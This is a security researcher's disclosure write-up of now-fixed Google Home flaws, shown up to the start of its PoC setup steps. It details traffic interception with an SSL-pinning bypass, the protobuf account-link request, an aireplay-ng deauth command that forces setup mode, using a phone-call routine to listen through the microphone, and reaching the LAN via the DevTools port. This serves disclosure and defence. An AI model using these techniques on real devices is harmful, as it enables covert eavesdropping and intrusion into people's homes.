Turning Google smart speakers into wiretaps for $100k

Summary

I was recently awarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a "backdoor" account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim's LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim's other devices). These issues have since been fixed.

(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google's other smart speaker models.)

Contents

- Investigation

- Creating malicious routines

- An attack scenario

- A cooler attack scenario

- What else can we do?

- PoCs

- The fixes

- Reflections/conclusions

- Disclosure timeline

- Prior research

- Footnotes

Investigation

I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.

Namely, the "routines" feature allows you to create shortcuts for running a series of other commands (e.g. a "good morning" routine that runs the commands "turn off the lights" and "tell me about the weather"). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install "actions" (tiny applications) onto it.

When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker's perspective.

So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):

- Obtaining the device's firmware by dumping it or downloading it from the vendor's website

- Static analysis of the app that interfaces with the device (in this case, the "Google Home" Android app), e.g. using Apktool or JADX to decompile it

- Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state

- Intercepting the communications between the app and the device (or between the app/device and the vendor's servers) using a "man-in-the-middle" (MITM) attack

Obtaining firmware is particularly difficult in the case of Google Home because there are no debugging/flashing pins on the device's PCB so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON though, it is possible.

However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it's usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it's FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.

Since the Google Home doesn't have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use dns-sd to discover them:

$ dns-sd -B _googlecast._tcp

Browsing for _googlecast._tcp

DATE: ---Fri 05 Aug 2022---

15:30:15.526 ...STARTING...

Timestamp A/R Flags if Domain Service Type Instance Name

15:30:15.527 Add 3 6 local. _googlecast._tcp. Chromecast-997113e3cc9fce38d8284cee20de6435

15:30:15.527 Add 3 6 local. _googlecast._tcp. Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb

15:30:15.527 Add 3 6 local. _googlecast._tcp. Google-Home-Mini-f09088353752a2e56bddbb2a27ec377a

We can use nmap to find the port that the local HTTP API is running on:

$ nmap 192.168.86.29

Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41

Nmap scan report for google-home-mini.lan (192.168.86.29)

Host is up (0.0075s latency).

Not shown: 995 closed ports

PORT STATE SERVICE

8008/tcp open http

8009/tcp open ajp13

8443/tcp open https-alt

9000/tcp open cslistener

10001/tcp open scp-config

We see HTTP servers on ports 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let's try issuing a request:

$ curl -s --insecure https://192.168.86.29:8443/setup/eureka_info?params=settings

{"settings":{"closed_caption":{},"control_notifications":1,"country_code":"US","locale":"en-US","network_standby":0,"system_sound_effects":true,"time_format":1,"timezone":"America/Chicago","wake_on_cast":1}}

(We use --insecure because the device sends a self-signed certificate, which the Google Home app is configured to trust, but my computer is not.)

Ok, we got the device's settings. However, the docs say that most API endpoints require a cast-local-authorization-token. Let's try something more interesting, rebooting the device:

$ curl -i --insecure -X POST -H 'Content-Type: application/json' -d '{"params":"now"}' https://192.168.86.29:8443/setup/reboot

HTTP/1.1 401 Unauthorized

Access-Control-Allow-Headers:Content-Type

Cache-Control:no-cache

Content-Length:0

Indeed, it's rejecting the request because we're not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app's private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that's already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.
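The two curl calls above can be reproduced from Python using only the standard library. This is a minimal sketch, not the script I ended up with: the helper names (insecure_context, build_request, send) are made up for illustration, and it assumes the token is sent in a request header named cast-local-authorization-token.

```python
import json
import ssl
import urllib.request

LOCAL_API_PORT = 8443  # per the unofficial docs, 8008 is deprecated


def insecure_context() -> ssl.SSLContext:
    """TLS context that skips certificate checks, like curl --insecure."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # must be disabled before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def build_request(ip, path, body=None, token=None) -> urllib.request.Request:
    """Build (but do not send) a local API request.

    Passing a JSON-serializable body turns the request into a POST.
    The token header name is an assumption based on the unofficial docs.
    """
    url = f"https://{ip}:{LOCAL_API_PORT}{path}"
    headers = {}
    data = None
    if body is not None:
        data = json.dumps(body).encode()
        headers["Content-Type"] = "application/json"
    if token is not None:
        headers["cast-local-authorization-token"] = token
    return urllib.request.Request(url, data=data, headers=headers)


def send(req: urllib.request.Request):
    """Send the request; a 401 surfaces as urllib.error.HTTPError."""
    with urllib.request.urlopen(req, context=insecure_context(), timeout=5) as resp:
        return resp.status, resp.read()
```

For example, send(build_request("192.168.86.29", "/setup/eureka_info?params=settings")) corresponds to the first curl command, and build_request("192.168.86.29", "/setup/reboot", body={"params": "now"}) to the second, which fails with 401 unless a valid token is supplied.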

Setting up the proxy

Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google's servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.

Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy's root CA certificate. You can install new CAs through Android Settings, but annoyingly, as of Android 7, apps using the system-provided networking APIs no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at /system/etc/security/cacerts). Alternatively, you could manually patch the individual app. However, sometimes even that isn't enough, as some apps employ "SSL pinning" to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (javax.net.ssl) or uses a popular HTTP library (e.g. OkHttp), it's not hard to bypass; just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you'll have to reverse engineer it and manually patch it out.

Patching and repacking the Google Home app isn't an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it'll crash), so root access is necessary to intercept its traffic. Since I didn't want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy's CA, but this wasn't sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.





I could now see all of the encrypted traffic showing up in mitmproxy:

Even the traffic between the app and device was being captured. Cool!
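With both kinds of traffic flowing through the proxy, a small addon helps tell them apart. The following is only a sketch of how mitmproxy's Python API could be used for that, not the setup I actually ran. It assumes a recent mitmproxy version that forwards the logging module to its event log, and it uses a rough heuristic of my own: a host that is a private IP literal is treated as the device, anything else as Google's servers.

```python
# label_flows.py -- load with: mitmproxy -s label_flows.py
import ipaddress
import logging


def classify(host: str) -> str:
    """Return "device" for private IP literals, "cloud" for anything else."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "cloud"  # a hostname, e.g. clients3.google.com
    return "device" if ip.is_private else "cloud"


def describe(method: str, host: str, path: str) -> str:
    """One-line summary of a request, prefixed with its classification."""
    return f"[{classify(host)}] {method} {host}{path}"


def request(flow) -> None:
    """Hook that mitmproxy calls once for every client request."""
    req = flow.request
    logging.info(describe(req.method, req.host, req.path))
```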

Observing the link process



Alright, so let's observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the "attacker". When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under "Other devices", and when I tapped on it, I was greeted with this screen:

I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don't care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn't required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.

Much of the internal architecture of Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be similar, too. In fact, the Home app's package name ends with chromecast.app, and it used to just be called "Chromecast". Back then, its only function was to set up Chromecast devices. Now it's responsible for setting up and managing not just Chromecasts, but all of Google's smart home devices.



Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It's bound to be simpler, because Chromecasts don't support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:

All I had to do was tap the "Enable voice control and more" banner and confirm, and then my account was linked! Ok, let's see what happened on the network side:



We see a POST request to a /deviceuserlinksbatch endpoint on clients3.google.com:

It's a binary payload, but we can immediately see that it contains some device details (e.g. the device's name, "Office TV"). We see that the content-type is application/protobuf. Protocol Buffers is Google's binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the .proto file, which defines the field names and data types (e.g. uint32, bool, string, etc). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been based on the wire type). Google provides a command-line tool called protoc that allows us to encode and decode protobuf data. The --decode_raw option tells protoc to decode without the .proto file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn't look right, you could create your own .proto with your data type guesses, try to decode, and if it still doesn't make sense, keep adjusting the .proto until it does.

In our case, --decode_raw produces a perfectly readable output:

$ protoc --decode_raw < deviceuserlinksbatch

1 {

1: "590C[...]"

2: "MIIDojCCAoqgAwIBAgIEVcQZjzANBgkqhkiG9w0BAQUFADB5MQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzENMAsGA1UECwwEQ2FzdDEZMBcGA1UEAwwQQ2hyb21lY2FzdCBJQ0EgMzAeFw0xNTA4MDcwMjM1NTlaFw0zNTA4MDIwMjM1NTlaMHwxEzARBgNVBAoMCkdvb2dsZSBJbmMxDTALBgNVBAsMBENhc3QxFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRwwGgYDVQQDDBMzVzM3OTkgRkE4RkNBMzJDRjBEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAleog/oEXK6PKyGHDIYcDwT2Xl8GLOFuhxQh/K+dTahxex9+4mLAXx5v2s75Iwv9jcXEpD5NTvjNXx20B0/rfpYORHbcm3UEwFWGnP5uvKIyLar+rC7Az5ZPzPXMx7xX6Br68/gOXMGJd17OG/m0rduBZNjmasBb7+Zu8jS38cv+N3S7yTobJbagrHxIufa7gX+rO2f3/jF2EutgcA4lIm5r/2J34fkYTMXnxElJCUv/b1COuk0FZTei4mooJ+TvcQE2ljgHOSvzGnZuT+QWch8TyRjIjKuIK4dB1UIcSvmQoq9PTbfzWCTcW1fREdPtnta6pyWIzmoJ9+3AhVnWAhwIDAQABoy8wLTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjANBgkqhkiG9w0BAQUFAAOCAQEAv11SILN9BfcUthEFq/0NJYnNIFoza21T1BR9qYymFKtUGOplFav00drHziTzUUCNUzbLGnR/yKXxXYlgUOlscEIHxN0+11tvWslHQk7Xgz2RUerBXy9l+vSwp87F8YVECny8lMFZi0T6hHUvtuM6O9qovQKS6ORx3GmZKlNOsNspPnF8IVpN+KtIiopL6vf84iCpbx+dQoOfUOZsbZ+XSxwT34yeNFXqdAIFwP1maMmPZZYnQrDYyUdyowYzk48fDG2QDhFf7dLjtCngcQ83MWWU5nx9On67hnj2VeFGKWsner4cwjs0+iVafUGiWD0tZejVXHSrR7TBouqOf9eG6Q=="

6: "Office TV"

7: "b"

8: 0

9 {

1: 1

2: 0

}

10: 2

12: 0

}
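To make the "field numbers and wire types" idea concrete, here is a minimal sketch of what a raw decoder does. It is not protoc's implementation: it only splits one message level into (field number, wire type, value) tuples and leaves length-delimited values as bytes, since without the .proto it cannot know whether they are strings or nested messages.

```python
def read_varint(buf: bytes, pos: int):
    """Decode a base-128 varint starting at pos; return (value, next_pos)."""
    value = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:  # high bit clear: last byte of the varint
            return value, pos
        shift += 7


def decode_raw(buf: bytes):
    """Split one protobuf message into (field, wire_type, value) tuples."""
    fields = []
    pos = 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field, wire_type = key >> 3, key & 0x07
        if wire_type == 0:  # varint: ints, bools, enums
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:  # length-delimited: string, bytes, nested message
            length, pos = read_varint(buf, pos)
            value = buf[pos:pos + length]
            pos += length
        elif wire_type == 1:  # fixed 64-bit
            value = buf[pos:pos + 8]
            pos += 8
        elif wire_type == 5:  # fixed 32-bit
            value = buf[pos:pos + 4]
            pos += 4
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields.append((field, wire_type, value))
    return fields
```

Calling decode_raw again on the bytes of a length-delimited field (such as field 9 above) yields its inner fields, which is essentially the guess protoc makes when it prints a nested block.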



Looks like the link request payload mainly consists of three things: device name, certificate, and "cloud ID". I quickly recognized these values from the earlier /setup/eureka_info local API requests. So it appears that the link process is:

- Get the device's info through its local API

- Send a link request to the Google server along with this info

I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast's info with the Google Home's info. I would eventually want to create a .proto file so I could use protoc --encode to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name ("Office speaker") was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home's settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device's local auth token was being sent along with local API requests.
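The same-length restriction exists because every string in the payload is preceded by its length, as is the enclosing message, so a longer or shorter replacement would leave those prefixes wrong. A minimal sketch of the swap, with a hypothetical helper name and a made-up replacement name:

```python
def swap_same_length(payload: bytes, old: bytes, new: bytes) -> bytes:
    """Replace old with new inside an encoded payload without re-encoding.

    Only safe when both values have the same length, because the length
    prefixes in front of the string and its parent message stay untouched.
    """
    if len(old) != len(new):
        raise ValueError("replacement must have the same length as the original")
    if payload.count(old) != 1:
        raise ValueError("expected exactly one occurrence of the original value")
    return payload.replace(old, new)


# Field 6 (device name): key byte 0x32, length 9, then the 9-byte name.
captured = b"\x32\x09Office TV"
patched = swap_same_length(captured, b"Office TV", b"Kitchen 1")
```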

Python re-implementation

The next thing I wanted to do is re-implement the link process with a Python script so I didn't have to bother with the Home app any more.

To get the required device info, we just need to issue a request like:

GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign

Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google's cloud APIs. It uses a library called gpsoauth which implements Android's Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It's being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.

I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:

POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b

Authorization: Bearer [token from gpsoauth]

[...some uninteresting headers added by the Home app...]

Content-Type: application/protobuf

[device info protobuf payload, described earlier]

To create the protobuf payload, I made a simple .proto file for the link request so I could use protoc --encode. I gave the fields I knew descriptive names (e.g. device_name), and the unknown fields generic names:

syntax = "proto2";

message LinkDevicePayload {

message Payload {

message Data {

required uint32 i1 = 1;

required uint32 i2 = 2;

}

required string device_id = 1;

required string device_cert = 2;

required string device_name = 6;

required string s7 = 7;

required uint32 i8 = 8;

required Data d = 9;

required uint32 i10 = 10;

required uint32 i12 = 12;

}

required Payload p = 1;

}

As a basic smoke test, I used this .proto to encode a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.
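For readers without protoc at hand, the same message can be assembled by hand, which also shows how little is in it. This is a sketch under assumptions, not the PoC code: the function names are mine, the values for the unknown fields (7 through 12) are simply copied from the one request captured above, and fields are written in field-number order.

```python
def varint(n: int) -> bytes:
    """Encode a non-negative integer as a base-128 varint."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def uint_field(number: int, value: int) -> bytes:
    """Wire type 0: key, then the value as a varint."""
    return varint(number << 3) + varint(value)


def bytes_field(number: int, value: bytes) -> bytes:
    """Wire type 2: key, length prefix, then the raw bytes."""
    return varint((number << 3) | 2) + varint(len(value)) + value


def link_payload(device_id: str, device_cert: str, device_name: str) -> bytes:
    """Encode a LinkDevicePayload as described by the .proto above."""
    data = uint_field(1, 1) + uint_field(2, 0)  # Data { i1 = 1, i2 = 0 }
    payload = (
        bytes_field(1, device_id.encode())
        + bytes_field(2, device_cert.encode())
        + bytes_field(6, device_name.encode())
        + bytes_field(7, b"b")  # s7, meaning unknown
        + uint_field(8, 0)      # i8, meaning unknown
        + bytes_field(9, data)
        + uint_field(10, 2)     # i10, meaning unknown
        + uint_field(12, 0)     # i12, meaning unknown
    )
    return bytes_field(1, payload)  # wrap in the outer "p" field
```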

Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.

Further investigation

Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account give you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the "Light Commands" attack, which provided some inspiration for coming up with commands that an attacker might use:

- Control smart home switches

- Open smart garage doors

- Make online purchases

- Remotely unlock and start certain vehicles

- Open smart locks by stealthily brute forcing the user's PIN number

I wanted to go further, though, and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device which opens the microphone? Looking at the "conversational actions" docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command "talk to my test app". But these "apps" can't really do much. They don't have access to the raw audio from the microphone; they only get a transcription of what the user says. They don't even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device's behalf. The "smart home actions" seemed more interesting, but that's something I explored later.

All of a sudden it hit me: these devices support a "call [phone number]" command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.



Creating malicious routines

The interface for creating a routine within the Google Home app looks like this:

With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website https://assistant.google.com/settings/routines, which loads fine in a normal web browser (as long as you're logged in to a Google account). This made reverse engineering it a little easier.



I created a routine to execute the command "call [my phone number]" on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a "device for audio" (a device to run the routine on). You can choose from a list of devices linked to your account:

A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home's microphone. Pretty cool!

(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)

An attack scenario

I had a feeling that Google didn't intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:

Attacker wishes to spy on victim.

- Victim installs attacker's malicious Android app.

- App detects a Google Home on the network via mDNS.

- App uses the basic LAN access it's automatically granted to silently issue the two HTTP requests necessary to link the attacker's account to the victim's device (no special permissions necessary).

Attacker can now spy on the victim through their Google Home.

This still requires social engineering and user interaction, though, which isn't ideal from an attacker's perspective. Can we make it cooler?

From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a "password" that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?

In 2019, "CastHack" made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices' use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).

The people behind CastHack didn't realize the true level of access that the local API provides (if combined with cloud APIs):

What can hackers do with this?

Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.

(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)

What CAN'T hackers do with this?

Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don't have access to your personal Google account, nor the Google Home's microphone.

There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn't pursue this for very long though, because ultimately bad router configuration is not something Google can fix.

While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the "RickMote", a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays "Never Gonna Give You Up" on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a "setup mode" and creates its own open Wi-Fi network. The intended purpose is to allow the device's owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The "RickMote" takes advantage of this behavior.

It turns out that it's usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of "deauth" packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, "management" frames, like deauthentication frames (which tell clients to disconnect) are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn't support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)

I wanted to check if this "setup mode" behavior was still in use on the Google Home. I installed aircrack-ng and used the following command to launch a deauth attack:

aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]



My Google Home immediately disconnected from the network and then made its own:

I connected to the network and used netstat to get the router's IP (the router being the Google Home), and saw that it assigned itself the IP 192.168.255.249. I issued a local API request to see if it would work:

$ curl -s --insecure https://192.168.255.249:8443/setup/eureka_info?params=name,device_info,sign | python3 -m json.tool

{

"device_info": {

[...]

"cloud_device_id": "590C[...]",

[...]

},

"name": "Office speaker",

"sign": {

"certificate": "-----BEGIN CERTIFICATE-----\nMIID[...]\n-----END CERTIFICATE-----\n",

[...]

}

}

I was shocked to see that it did! With this information, it's possible to link an account to the device and remotely control it.
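The three values the link request needs can be pulled straight out of this JSON. A minimal sketch, with hypothetical function names; it assumes that the certificate string in the link payload is just the PEM body with the BEGIN/END lines and newlines removed, which matches the "MIID..." prefix seen in both places but is otherwise a guess.

```python
def pem_body(pem: str) -> str:
    """Strip the PEM armor lines and join the base64 lines into one string."""
    lines = [line.strip() for line in pem.strip().splitlines()]
    return "".join(line for line in lines if line and not line.startswith("-----"))


def link_fields(info: dict) -> dict:
    """Pick the cloud ID, certificate and name from an eureka_info response."""
    return {
        "device_id": info["device_info"]["cloud_device_id"],
        "device_cert": pem_body(info["sign"]["certificate"]),
        "device_name": info["name"],
    }
```

The input is the parsed response (e.g. the result of json.loads on the body returned by the curl command above), and the output keys mirror the descriptive field names in the .proto file.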

A cooler attack scenario

Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim's Wi-Fi password).

- Attacker discovers victim's Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g. E4:F0:42).

- Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.

- Attacker connects to the device's setup network and requests its device info.

- Attacker connects to the Internet and uses the obtained device info to link their account to the victim's device.

Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).
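The discovery step boils down to comparing the first three bytes of each observed MAC address against a list of vendor prefixes. A small sketch of that check; the prefix set contains only the one example given above (a real list would be longer), and the function names are illustrative.

```python
import string

# Only the example prefix from the text; not a complete list.
GOOGLE_PREFIXES = {"E4:F0:42"}


def normalize_mac(mac: str) -> str:
    """Return the MAC as upper-case, colon-separated hex pairs."""
    digits = "".join(c for c in mac if c in string.hexdigits).upper()
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def has_vendor_prefix(mac: str, prefixes=GOOGLE_PREFIXES) -> bool:
    """True if the first three bytes match one of the given prefixes."""
    return normalize_mac(mac)[:8] in prefixes
```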

What else can we do?

Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren't already on the victim's network. Would it be possible to interact with (and potentially attack) the victim's other devices through the compromised Google Home? We already know that with a linked account you can:

- Get the local auth token and change device settings through the local API

- Execute commands on the device remotely through "routines"

- Install "actions", which are like sandboxed applications

Earlier I looked into "conversational actions" and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: "smart home actions". Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says "turn on the lights", their Philips Hue light bulbs will receive a "turn on" command).

One thing I found particularly interesting while reading the documentation was the "Local Home SDK". Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.

The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.

Sounded promising. I looked into how it works though and it turns out that these local home apps don't have direct LAN access. You can't just connect to any IP you want; rather, you need to specify a "scan configuration" using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.

Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer's own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.

I created a local home app using my linked account and set up the scan config to search for the _googlecast._tcp.local mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself and I was able to issue HTTP requests to localhost!

CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn't apply to WebSockets, so we can easily initiate a WebSocket to localhost from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to http://[CDP host]:9222/json. This is normally protected by the same-origin policy, so we can't just use an XHR request, but since we have full access to localhost through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS WebSocket() constructor to connect.
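To illustrate the two pieces of data involved, here is a sketch in Python (the real app ran as JavaScript on the device, so this only shows the shapes, not my code). The /json endpoint returns a JSON array of targets, each normally carrying a webSocketDebuggerUrl, and CDP commands are JSON objects with an id, a method and params. The sample target below is made up.

```python
import json


def debugger_urls(targets_json: str) -> list:
    """Extract the WebSocket debugger URLs from a /json response body."""
    targets = json.loads(targets_json)
    return [t["webSocketDebuggerUrl"] for t in targets if "webSocketDebuggerUrl" in t]


def cdp_command(msg_id: int, method: str, params=None) -> str:
    """Serialize one CDP command to send over the WebSocket."""
    return json.dumps({"id": msg_id, "method": method, "params": params or {}})


# Hypothetical response from http://[CDP host]:9222/json
sample = '[{"id": "X", "type": "page", "webSocketDebuggerUrl": "ws://localhost:9222/devtools/page/X"}]'
urls = debugger_urls(sample)
message = cdp_command(1, "Runtime.evaluate", {"expression": "1 + 1"})
```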

Through CDP, we can send arbitrary HTTP requests within the victim's LAN, which opens up the victim's other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.

PoCs

The following PoCs have been published here: https://github.com/DownrightNifty/gh_hack_PoC

Since the security issues have been fixed, these probably no longer work, but I thought they were worth documenting/preserving.

PoC #1: Spy on victim

I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.

For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities: google_login.py, link_device.py, reset_volume.py, call_device.py.

- Download protoc and add it to your PATH

